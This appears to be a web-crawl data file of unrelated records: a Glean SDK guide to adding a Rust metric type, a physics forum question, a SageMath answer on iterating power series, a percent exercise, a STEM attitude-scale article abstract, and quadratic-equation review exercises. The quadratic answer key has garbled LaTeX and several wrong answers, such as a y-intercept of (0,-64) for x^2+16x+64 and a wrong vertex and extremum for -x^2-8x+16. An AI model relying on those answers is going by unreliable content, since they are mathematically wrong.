url
stringlengths
14
2.42k
text
stringlengths
100
1.02M
date
stringlengths
19
19
metadata
stringlengths
1.06k
1.1k
https://mozilla.github.io/glean/book/dev/core/new-metric-type.html
# Adding a new metric type Data in the Glean SDK is stored in so-called metrics. You can find the full list of implemented metric types in the user overview. Adding a new metric type involves defining the metric type's API, its persisted and in-memory storage as well as its serialization into the ping payload. ## The metric type's API A metric type implementation is defined in its own file under glean-core/src/metrics/, e.g. glean-core/src/metrics/counter.rs for a Counter. Start by defining a structure to hold the metric's metadata: #[derive(Clone, Debug)] pub struct CounterMetric { meta: CommonMetricData } Implement the MetricType trait to create a metric from the meta data as well as expose the meta data. This also gives you a should_record method on the metric type. impl MetricType for CounterMetric { fn meta(&self) -> &CommonMetricData { &self.meta } fn meta_mut(&mut self) -> &mut CommonMetricData { &mut self.meta } } Its implementation should have a way to create a new metric from the common metric data. It should be the same for all metric types. impl CounterMetric { pub fn new(meta: CommonMetricData) -> Self { Self { meta } } } Implement each method for the type. The first argument to accept should always be glean: &Glean, that is: a reference to the Glean object, used to access the storage: impl CounterMetric { // same block as above pub fn add(&self, glean: &Glean, amount: i32) { // Always include this check! if !self.should_record() { return; } // Do error handling here glean .storage() .record_with(&self.meta, |old_value| match old_value { Some(Metric::Counter(old_value)) => Metric::Counter(old_value + amount), _ => Metric::Counter(amount), }) } } Use glean.storage().record() to record a fixed value or glean.storage.record_with() to construct a new value from the currently stored one. The storage operation makes use of the metric's variant of the Metric enumeration. ## The Metric enumeration Persistence and in-memory serialization as well as ping payload serialization are handled through the Metric enumeration. This is defined in glean-core/src/metrics/mod.rs. Variants of this enumeration are used in the storage implementation of the metric type. To add a new metric type, include the metric module and declare its use, then add a new variant to the Metric enum: mod counter; // ... pub use self::counter::CounterMetric; #[derive(Serialize, Deserialize, Debug, Clone)] pub enum Metric { // ... Counter(i32), } Then modify the below implementation and define the right ping section name for the new type. This will be used in the ping payload: impl Metric { pub fn ping_section(&self) -> &'static str { match self { // ... Metric::Counter(_) => "counter", } } } Finally, define the ping payload serialization (as JSON). In the simple cases where the in-memory representation maps to its JSON representation it is enough to call the json! macro. impl Metric { // same block as above pub fn as_json(&self) -> JsonValue { match self { // ... Metric::Counter(c) => json!(c), } } } For more complex serialization consider implementing serialization logic as a function returning a serde_json::Value or another object that can be serialized. For example, the DateTime serializer has the following entry, where get_iso_time_string is a function to convert from the DateTime metric representation to a string: Metric::Datetime(d, time_unit) => json!(get_iso_time_string(*d, *time_unit)), In the next step we will create the FFI wrapper and platform-specific wrappers.
2020-03-31 00:05:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2136271446943283, "perplexity": 9756.63521255968}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370497309.31/warc/CC-MAIN-20200330212722-20200331002722-00541.warc.gz"}
https://www.physicsforums.com/threads/number-of-weighted-vacuum-feynman-diagrams.611561/
# Homework Help: Number of weighted vacuum Feynman diagrams 1. Jun 5, 2012 ### th13 I didn't know where to put this, because it isn't a homework or coursework I have to do but just a thing I'm trying to understand. Anyway, I have attached the problem as an image. We have a scalar quartic lagrangian in d dimensions. It says that the number of vacuum Feynman diagrams, at a given order λ^k, weighted by their statistical factor, should depend on the number of dimension d. If understand well what the "statistical factor" is, i.e. the number of ways to join the vertices of a given diagram, I can't figure out how it could be dependent on the number of space-time dimensions d. Any suggestions? Thank you and sorry for my English File size: 7.6 KB Views: 113
2018-06-21 20:38:21
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8623544573783875, "perplexity": 502.8955191576801}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-26/segments/1529267864257.17/warc/CC-MAIN-20180621192119-20180621212119-00242.warc.gz"}
https://ask.sagemath.org/question/39960/how-can-i-recurse-a-power-series-in-two-variables/?sort=votes
# How can I recurse a power series in two variables? I would like very much to express, for example, R.<x, y> = PowerSeriesRing(QQ, default_prec = 20) g(x, g(x, g(x, x))) Or, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, (f(x, (f(x, f(x,y))))))))))))))))).expand() In a more elegant way, for a specified number of self-compositions in one variable. I have only been able to find the sage function of composition for one variable polynomials, not for nesting two variable power series. edit retag close merge delete Could you provide a definition of f and g that one could use to explore your question? ( 2017-12-06 08:29:35 +0200 )edit Note: with R as in the question, R.random_element() gave a starting point for exploration. ( 2017-12-08 16:03:27 +0200 )edit In general though, providing a working example helps other Ask Sage users to explore a question. This question had g(x, g(x, g(x, x))) but no definition of g to make that work. ( 2017-12-08 16:06:39 +0200 )edit Sort by » oldest newest most voted Defining a function would give you a nice syntax for this kind of iteration. For example, let us define right_iterate as follows. def right_iterate(n, g): x, y = g.parent().gens() gg = y for k in xrange(n): gg = g(x, gg) return gg Suppose we defined sage: g = x*y^3 + x^3*y^11 - 1/21*x^11*y^5 - 2/5*x^3*y^13 + O(x, y)^60 sage: g(x, g(x, g(x, y))) x^13*y^27 + 9*x^15*y^35 - 3/7*x^23*y^29 - 18/5*x^15*y^37 - 1/7*x^25*y^33 + O(x, y)^60 one can write sage: right_iterate(3, g) x^13*y^27 + 9*x^15*y^35 - 3/7*x^23*y^29 - 18/5*x^15*y^37 - 1/7*x^25*y^33 + O(x, y)^60 sage: g(x, g(x, g(x, x))) x^40 + 9*x^50 - 141/35*x^52 - 1/7*x^58 + O(x, y)^60 one can write sage: right_iterate(3, g)(x, x) x^40 + 9*x^50 - 141/35*x^52 - 1/7*x^58 + O(x, y)^60 Of course, you could modify the function to directly use (x, x) if you always want that. more
2021-09-16 16:03:53
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.20407256484031677, "perplexity": 13115.01361656547}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780053657.29/warc/CC-MAIN-20210916145123-20210916175123-00451.warc.gz"}
https://www.gradesaver.com/textbooks/math/applied-mathematics/elementary-technical-mathematics/chapter-1-section-1-14-rate-base-and-part-exercises-page-84/25
## Elementary Technical Mathematics Published by Brooks Cole # Chapter 1 - Section 1.14 - Rate, Base, and Part - Exercises: 25 36.9% #### Work Step by Step The part is 24 hours. The base is 65 hours, the number following "of". The rate is unknown. $R=\frac{P}{B}=\frac{24}{65}=0.3692$ To convert the decimal to a percent, move the decimal two places to the right. Round to the nearest tenth. $0.3692\approx36.9\%$ After you claim an answer you’ll have 24 hours to send in a draft. An editor will review the submission and either publish your submission or provide feedback.
2018-07-22 20:36:49
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6404308080673218, "perplexity": 1722.2513366796634}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676593586.54/warc/CC-MAIN-20180722194125-20180722214125-00632.warc.gz"}
http://dergipark.gov.tr/ijemst/issue/39894/509258
| | | | ## Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study #### Ibrahim Benek [1] , Behiye Akcay [2] ##### 0 28 The aim of this study is to develop a valid and reliable attitude scale that could measure secondary school students' attitudes towards the Science-Technology-Engineering and Mathematics (STEM). This study was conducted in 2017-2018 academic year with 2500 secondary school students studying in the  5th, 6th, 7th and 8th grades from fifteen (15) different secondary schools in ten different (10) provinces of seven (7) different regions of Turkey. The study is designed according to the scanning method which is a descriptive research method. When determining the sample of the research, stratified sampling method was taken into consideration. Explanatory Factor Analysis (EFA) and Confirmatory Factor Analysis (CFA) were performed to test the validity of the scale structure. KMO in EFA .919, and the Barlett’s test χ2 value was found as 26236,010 (p <.001). As a result of CFA to determine the model fit of the scale, chi-square fit value of the factor structure consisting of 33 items and 6 sub-factors (χ ² = 4083.21, Sd = 480, p = 00) was found to be significant and the following was found RMSEA: .0548, RMR: .0486, SRMR: .0486, GFI: .902, AGFI: .885, IFI: .902, NFI: .890, NNFI: .892 and CFI: .902. Since all fit values are within acceptable limits, it is concluded that the six-factor structure of scale is a usable, valid model. Internal consistency and test-retest reliability analyzes were performed to determine the reliability of the scale. As a result, the Cronbach Alpha (α) internal consistency reliability value of the scale was found as 0.887 and the test-retest reliability value was found as 0.804. Based on this, the scale can be said to be highly reliable. It is concluded that the scale consisting of 33 items and six factors is a valid and reliable tool which determines middle school students’ attitudes toward STEM. STEM, Scale, Validity, Reliability • Benek, I. & Akcay, B. (2019). Development of STEM attitude scale for secondary school students: Validity and reliability study. International Journal of Education in Mathematics, Science and Technology (IJEMST), 7(1), 32-52. DOI:10.18404/ijemst.509258 Birincil Dil en Sosyal Makaleler Yazar: Ibrahim Benek Yazar: Behiye Akcay Bibtex @araştırma makalesi { ijemst509258, journal = {International Journal of Education in Mathematics, Science and Technology}, issn = {}, eissn = {2147-611X}, address = {ISRES Publishing}, year = {2019}, volume = {7}, pages = {32 - 52}, doi = {10.18404/ijemst.509258}, title = {Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study}, key = {cite}, author = {Benek, Ibrahim and Akcay, Behiye} } APA Benek, I , Akcay, B . (2019). Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study. International Journal of Education in Mathematics, Science and Technology, 7 (1), 32-52. DOI: 10.18404/ijemst.509258 MLA Benek, I , Akcay, B . "Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study". International Journal of Education in Mathematics, Science and Technology 7 (2019): 32-52 Chicago Benek, I , Akcay, B . "Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study". International Journal of Education in Mathematics, Science and Technology 7 (2019): 32-52 RIS TY - JOUR T1 - Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study AU - Ibrahim Benek , Behiye Akcay Y1 - 2019 PY - 2019 N1 - doi: 10.18404/ijemst.509258 DO - 10.18404/ijemst.509258 T2 - International Journal of Education in Mathematics, Science and Technology JF - Journal JO - JOR SP - 32 EP - 52 VL - 7 IS - 1 SN - -2147-611X M3 - doi: 10.18404/ijemst.509258 UR - http://dx.doi.org/10.18404/ijemst.509258 Y2 - 2018 ER - EndNote %0 International Journal of Education in Mathematics, Science and Technology Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study %A Ibrahim Benek , Behiye Akcay %T Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study %D 2019 %J International Journal of Education in Mathematics, Science and Technology %P -2147-611X %V 7 %N 1 %R doi: 10.18404/ijemst.509258 %U 10.18404/ijemst.509258 ISNAD Benek, Ibrahim , Akcay, Behiye . "Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study". International Journal of Education in Mathematics, Science and Technology 7 / 1 (Ocak 2019): 32-52. http://dx.doi.org/10.18404/ijemst.509258
2019-01-24 02:14:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.23864169418811798, "perplexity": 7974.294247045481}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547584445118.99/warc/CC-MAIN-20190124014810-20190124040810-00549.warc.gz"}
https://au.mathematicstip.com/8341-19e-review-exercises-2.html
# 19.E: Review Exercises 2 ## Chapter Review Exercises ### Solve Quadratic Equations Using the Square Root Property Exercise (PageIndex{1}) Solve Quadratic Equations of the Form (ax^{2}=k) Using the Square Root Property In the following exercises, solve using the Square Root Property. 1. (y^{2}=144) 2. (n^{2}-80=0) 3. (4 a^{2}=100) 4. (2 b^{2}=72) 5. (r^{2}+32=0) 6. (t^{2}+18=0) 7. (frac{2}{3} w^{2}-20=30) 8. (5 c^{2}+3=19) 1. (y=pm 12) 3. (a=pm 5) 5. (r=pm 4 sqrt{2} i) 7. (w=pm 5 sqrt{3}) Exercise (PageIndex{2}) Solve Quadratic Equations of the Form (a(x-h)^{2}=k) Using the Square Root Property In the following exercises, solve using the Square Root Property. 1. ((p-5)^{2}+3=19) 2. ((u+1)^{2}=45) 3. (left(x-frac{1}{4} ight)^{2}=frac{3}{16}) 4. (left(y-frac{2}{3} ight)^{2}=frac{2}{9}) 5. ((n-4)^{2}-50=150) 6. ((4 c-1)^{2}=-18) 7. (n^{2}+10 n+25=12) 8. (64 a^{2}+48 a+9=81) 1. (p=-1,9) 3. (x=frac{1}{4} pm frac{sqrt{3}}{4}) 5. (n=4 pm 10 sqrt{2}) 7. (n=-5 pm 2 sqrt{3}) ### Solve Quadratic Equations by Completing the Square Exercise (PageIndex{3}) Solve Quadratic Equations Using Completing the Square In the following exercises, complete the square to make a perfect square trinomial. Then write the result as a binomial squared. 1. (x^{2}+22 x) 2. (m^{2}-8 m) 3. (a^{2}-3 a) 4. (b^{2}+13 b) 1. ((x+11)^{2}) 3. (left(a-frac{3}{2} ight)^{2}) Exercise (PageIndex{4}) Solve Quadratic Equations Using Completing the Square In the following exercises, solve by completing the square. 1. (d^{2}+14 d=-13) 2. (y^{2}-6 y=36) 3. (m^{2}+6 m=-109) 4. (t^{2}-12 t=-40) 5. (v^{2}-14 v=-31) 6. (w^{2}-20 w=100) 7. (m^{2}+10 m-4=-13) 8. (n^{2}-6 n+11=34) 9. (a^{2}=3 a+8) 10. (b^{2}=11 b-5) 11. ((u+8)(u+4)=14) 12. ((z-10)(z+2)=28) 1. (d=-13,-1) 3. (m=-3 pm 10 i) 5. (v=7 pm 3 sqrt{2}) 7. (m=-9,-1) 9. (a=frac{3}{2} pm frac{sqrt{41}}{2}) 11. (u=-6 pm 2 sqrt{2}) ### Solve Quadratic Equations of the Form (ax^{2}+bx+c=0) by Completing the Square Exercise (PageIndex{5}) Solve Quadratic Equations of the Form (ax^{2}+bx+c=0) by Completing the Square In the following exercises, solve by completing the square. 1. (3 p^{2}-18 p+15=15) 2. (5 q^{2}+70 q+20=0) 3. (4 y^{2}-6 y=4) 4. (2 x^{2}+2 x=4) 5. (3 c^{2}+2 c=9) 6. (4 d^{2}-2 d=8) 7. (2 x^{2}+6 x=-5) 8. (2 x^{2}+4 x=-5) 1. (p=0,6) 3. (y=-frac{1}{2}, 2) 5. (c=-frac{1}{3} pm frac{2 sqrt{7}}{3}) 7. (x=frac{3}{2} pm frac{1}{2} i) In the following exercises, solve by using the Quadratic Formula. 1. (4 x^{2}-5 x+1=0) 2. (7 y^{2}+4 y-3=0) 3. (r^{2}-r-42=0) 4. (t^{2}+13 t+22=0) 5. (4 v^{2}+v-5=0) 6. (2 w^{2}+9 w+2=0) 7. (3 m^{2}+8 m+2=0) 8. (5 n^{2}+2 n-1=0) 9. (6 a^{2}-5 a+2=0) 10. (4 b^{2}-b+8=0) 11. (u(u-10)+3=0) 12. (5 z(z-2)=3) 13. (frac{1}{8} p^{2}-frac{1}{5} p=-frac{1}{20}) 14. (frac{2}{5} q^{2}+frac{3}{10} q=frac{1}{10}) 15. (4 c^{2}+4 c+1=0) 16. (9 d^{2}-12 d=-4) 1. (x=frac{1}{4}, 1) 3. (r=-6,7) 5. (v=frac{-1 pm sqrt{21}}{8}) 7. (m=frac{-4 pm sqrt{10}}{3}) 9. (a=frac{5}{12} pm frac{sqrt{23}}{12} i) 11. (u=5 pm sqrt{21}) 13. (p=frac{4 pm sqrt{5}}{5}) 15. (c=-frac{1}{2}) Exercise (PageIndex{7}) Use the Discriminant to Predict the Number of Solutions of a Quadratic Equation In the following exercises, determine the number of solutions for each quadratic equation. 1. (9 x^{2}-6 x+1=0) 2. (3 y^{2}-8 y+1=0) 3. (7 m^{2}+12 m+4=0) 4. (5 n^{2}-n+1=0) 1. (5 x^{2}-7 x-8=0) 2. (7 x^{2}-10 x+5=0) 3. (25 x^{2}-90 x+81=0) 4. (15 x^{2}-8 x+4=0) 1. 1. (1) 2. (2) 3. (2) 4. (2) Exercise (PageIndex{8}) Identify the Most Appropriate Method to Use to Solve a Quadratic Equation In the following exercises, identify the most appropriate method (Factoring, Square Root, or Quadratic Formula) to use to solve each quadratic equation. Do not solve. 1. (16 r^{2}-8 r+1=0) 2. (5 t^{2}-8 t+3=9) 3. (3(c+2)^{2}=15) 1. (4 d^{2}+10 d-5=21) 2. (25 x^{2}-60 x+36=0) 3. (6(5 v-7)^{2}=150) 1. 1. Factor 3. Square Root ### Solve Equations in Quadratic Form Exercise (PageIndex{9}) Solve Equations in Quadratic Form In the following exercises, solve. 1. (x^{4}-14 x^{2}+24=0) 2. (x^{4}+4 x^{2}-32=0) 3. (4 x^{4}-5 x^{2}+1=0) 4. ((2 y+3)^{2}+3(2 y+3)-28=0) 5. (x+3 sqrt{x}-28=0) 6. (6 x+5 sqrt{x}-6=0) 7. (x^{frac{2}{3}}-10 x^{frac{1}{3}}+24=0) 8. (x+7 x^{frac{1}{2}}+6=0) 9. (8 x^{-2}-2 x^{-1}-3=0) 1. (x=pm sqrt{2}, x=pm 2 sqrt{3}) 3. (x=pm 1, x=pm frac{1}{2}) 5. (x=16) 7. (x=64, x=216) 9. (x=-2, x=frac{4}{3}) ### Solve Applications of Quadratic Equations Exercise (PageIndex{10}) Solve Applications Modeled by Quadratic Equations In the following exercises, solve by using the method of factoring, the square root principle, or the Quadratic Formula. Round your answers to the nearest tenth, if needed. 1. Find two consecutive odd numbers whose product is (323). 2. Find two consecutive even numbers whose product is (624). 3. A triangular banner has an area of (351) square centimeters. The length of the base is two centimeters longer than four times the height. Find the height and length of the base. 4. Julius built a triangular display case for his coin collection. The height of the display case is six inches less than twice the width of the base. The area of the of the back of the case is (70) square inches. Find the height and width of the case. 5. A tile mosaic in the shape of a right triangle is used as the corner of a rectangular pathway. The hypotenuse of the mosaic is (5) feet. One side of the mosaic is twice as long as the other side. What are the lengths of the sides? Round to the nearest tenth. Figure 9.E.1 6. A rectangular piece of plywood has a diagonal which measures two feet more than the width. The length of the plywood is twice the width. What is the length of the plywood’s diagonal? Round to the nearest tenth. 7. The front walk from the street to Pam’s house has an area of (250) square feet. Its length is two less than four times its width. Find the length and width of the sidewalk. Round to the nearest tenth. 8. For Sophia’s graduation party, several tables of the same width will be arranged end to end to give serving table with a total area of (75) square feet. The total length of the tables will be two more than three times the width. Find the length and width of the serving table so Sophia can purchase the correct size tablecloth . Round answer to the nearest tenth. 9. A ball is thrown vertically in the air with a velocity of (160) ft/sec. Use the formula (h=-16 t^{2}+v_{0} t) to determine when the ball will be (384) feet from the ground. Round to the nearest tenth. 10. The couple took a small airplane for a quick flight up to the wine country for a romantic dinner and then returned home. The plane flew a total of (5) hours and each way the trip was (360) miles. If the plane was flying at (150) mph, what was the speed of the wind that affected the plane? 11. Ezra kayaked up the river and then back in a total time of (6) hours. The trip was (4) miles each way and the current was difficult. If Roy kayaked at a speed of (5) mph, what was the speed of the current? 12. Two handymen can do a home repair in (2) hours if they work together. One of the men takes (3) hours more than the other man to finish the job by himself. How long does it take for each handyman to do the home repair individually? 2. Two consecutive even numbers whose product is (624) are (24) and (26), and (−24) and (−26). 4. The height is (14) inches and the width is (10) inches. 6. The length of the diagonal is (3.6) feet. 8. The width of the serving table is (4.7) feet and the length is (16.1) feet. 10. The speed of the wind was (30) mph. 12. One man takes (3) hours and the other man (6) hours to finish the repair alone. ### Graph Quadratic Functions Using Properties Exercise (PageIndex{11}) Recognize the Graph of a Quadratic Function In the following exercises, graph by plotting point. 1. Graph (y=x^{2}-2) 2. Graph (y=-x^{2}+3) 2. Exercise (PageIndex{12}) Recognize the Graph of a Quadratic Function In the following exercises, determine if the following parabolas open up or down. 1. (y=-3 x^{2}+3 x-1) 2. (y=5 x^{2}+6 x+3) 1. (y=x^{2}+8 x-1) 2. (y=-4 x^{2}-7 x+1) 2. 1. Up 2. Down Exercise (PageIndex{13}) Find the Axis of Symmetry and Vertex of a Parabola In the following exercises, find 1. The equation of the axis of symmetry 2. The vertex 1. (y=-x^{2}+6 x+8) 2. (y=2 x^{2}-8 x+1) 2. (x=2) ; ((2,-7)) Exercise (PageIndex{14}) Find the Intercepts of a Parabola In the following exercises, find the (x)- and (y)-intercepts. 1. (y=x^{2}-4x+5) 2. (y=x^{2}-8x+15) 3. (y=x^{2}-4x+10) 4. (y=-5x^{2}-30x-46) 5. (y=16x^{2}-8x+1) 6. (y=x^{2}+16x+64) 2. (egin{array}{l}{y :(0,15)} {x :(3,0),(5,0)}end{array}) 4. (egin{array}{l}{y :(0,-46)} {x : ext { none }}end{array}) 6. (egin{array}{l}{y :(0,-64)} {x :(-8,0)}end{array}) #### Graph Quadratic Functions Using Properties Exercise (PageIndex{15}) Graph Quadratic Functions Using Properties In the following exercises, graph by using its properties. 1. (y=x^{2}+8 x+15) 2. (y=x^{2}-2 x-3) 3. (y=-x^{2}+8 x-16) 4. (y=4 x^{2}-4 x+1) 5. (y=x^{2}+6 x+13) 6. (y=-2 x^{2}-8 x-12) 2. 4. 6. Exercise (PageIndex{16}) Solve Maximum and Minimum Applications In the following exercises, find the minimum or maximum value. 1. (y=7 x^{2}+14 x+6) 2. (y=-3 x^{2}+12 x-10) 2. The maximum value is (2) when (x=2). Exercise (PageIndex{17}) Solve Maximum and Minimum Applications In the following exercises, solve. Rounding answers to the nearest tenth. 1. A ball is thrown upward from the ground with an initial velocity of (112) ft/sec. Use the quadratic equation (h=-16 t^{2}+112 t) to find how long it will take the ball to reach maximum height, and then find the maximum height. 2. A daycare facility is enclosing a rectangular area along the side of their building for the children to play outdoors. They need to maximize the area using (180) feet of fencing on three sides of the yard. The quadratic equation (A=-2 x^{2}+180 x) gives the area, (A), of the yard for the length, (x), of the building that will border the yard. Find the length of the building that should border the yard to maximize the area, and then find the maximum area. 2. The length adjacent to the building is (90) feet giving a maximum area of (4,050) square feet. ### Graph Quadratic Functions Using Transformations Exercise (PageIndex{18}) Graph Quadratic Functions of the Form (f(x)=x^{2}+k) In the following exercises, graph each function using a vertical shift. 1. (g(x)=x^{2}+4) 2. (h(x)=x^{2}-3) 2. Exercise (PageIndex{19}) Graph Quadratic Functions of the Form (f(x)=x^{2}+k) In the following exercises, graph each function using a horizontal shift. 1. (f(x)=(x+1)^{2}) 2. (g(x)=(x-3)^{2}) 2. Exercise (PageIndex{20}) Graph Quadratic Functions of the Form (f(x)=x^{2}+k) In the following exercises, graph each function using transformations. 1. (f(x)=(x+2)^{2}+3) 2. (f(x)=(x+3)^{2}-2) 3. (f(x)=(x-1)^{2}+4) 4. (f(x)=(x-4)^{2}-3) 2. 4. Exercise (PageIndex{21}) Graph Quadratic Functions of the Form (f(x)=ax^{2}) In the following exercises, graph each function. 1. (f(x)=2x^{2}) 2. (f(x)=-x^{2}) 3. (f(x)=frac{1}{2} x^{2}) 2. Exercise (PageIndex{22}) Graph Quadratic Functions Using Transformations In the following exercises, rewrite each function in the (f(x)=a(x-h)^{2}+k) form by completing the square. 1. (f(x)=2 x^{2}-4 x-4) 2. (f(x)=3 x^{2}+12 x+8) 1. (f(x)=2(x-1)^{2}-6) Exercise (PageIndex{23}) Graph Quadratic Functions Using Transformations In the following exercises, 1. Rewrite each function in (f(x)=a(x−h)^{2}+k) form 2. Graph it by using transformations 1. (f(x)=3 x^{2}-6 x-1) 2. (f(x)=-2 x^{2}-12 x-5) 3. (f(x)=2 x^{2}+4 x+6) 4. (f(x)=3 x^{2}-12 x+7) 1. 1. (f(x)=3(x-1)^{2}-4) 2. Figure 9.E.13 3. 1. (f(x)=2(x+1)^{2}+4) 2. Figure 9.E.14 Exercise (PageIndex{24}) Graph Quadratic Functions Using Transformations In the following exercises, 1. Rewrite each function in (f(x)=a(x−h)^{2}+k) form 2. Graph it using properties 1. (f(x)=-3 x^{2}-12 x-5) 2. (f(x)=2 x^{2}-12 x+7) 1. 1. (f(x)=-3(x+2)^{2}+7) 2. Figure 9.E.15 Exercise (PageIndex{25}) Find a Quadratic Function From its Graph In the following exercises, write the quadratic function in (f(x)=a(x−h)^{2}+k) form. 1. Figure 9.E.16 2. Figure 9.E.17 1. (f(x)=(x+1)^{2}-5) Exercise (PageIndex{26}) Solve Quadratic Inequalities Graphically In the following exercises, solve graphically and write the solution in interval notation. 1. (x^{2}-x-6>0) 2. (x^{2}+4 x+3 leq 0) 3. (-x^{2}-x+2 geq 0) 4. (-x^{2}+2 x+3<0) 1. 1. Figure 9.E.18 2. ((-infty,-2) cup(3, infty)) 3. 1. Figure 9.E.19 2. ([-2,1]) Exercise (PageIndex{27}) Solve Quadratic Inequalities Graphically In the following exercises, solve each inequality algebraically and write any solution in interval notation. 1. (x^{2}-6 x+8<0) 2. (x^{2}+x>12) 3. (x^{2}-6 x+4 leq 0) 4. (2 x^{2}+7 x-4>0) 5. (-x^{2}+x-6>0) 6. (x^{2}-2 x+4 geq 0) 1. ((2,4)) 3. ([3-sqrt{5}, 3+sqrt{5}]) 5. no solution ## Practice Test Exercise (PageIndex{28}) 1. Use the Square Root Property to solve the quadratic equation (3(w+5)^{2}=27). 2. Use Completing the Square to solve the quadratic equation (a^{2}-8 a+7=23). 3. Use the Quadratic Formula to solve the quadratic equation (2 m^{2}-5 m+3=0). 1. (w=-2, w=-8) 3. (m=1, m=frac{3}{2}) Exercise (PageIndex{29}) Solve the following quadratic equations. Use any method. 1. (2 x(3 x-2)-1=0) 2. (frac{9}{4} y^{2}-3 y+1=0) 2. (y=frac{2}{3}) Exercise (PageIndex{30}) Use the discriminant to determine the number and type of solutions of each quadratic equation. 1. (6 p^{2}-13 p+7=0) 2. (3 q^{2}-10 q+12=0) 2. (2) complex Exercise (PageIndex{31}) Solve each equation. 1. (4 x^{4}-17 x^{2}+4=0) 2. (y^{frac{2}{3}}+2 y^{frac{1}{3}}-3=0) 2. (y=1, y=-27) Exercise (PageIndex{32}) For each parabola, find 1. Which direction it opens 2. The equation of the axis of symmetry 3. The vertex 4. The (x)-and (y)-intercepts 5. The maximum or minimum value 1. (y=3 x^{2}+6 x+8) 2. (y=-x^{2}-8 x+16) 2. 1. down 2. (x=-4) 3. ((-4,0)) 4. (y: (0,16); x: (-4,0)) 5. minimum value of (-4) when (x=0) Exercise (PageIndex{33}) Graph each quadratic function using intercepts, the vertex, and the equation of the axis 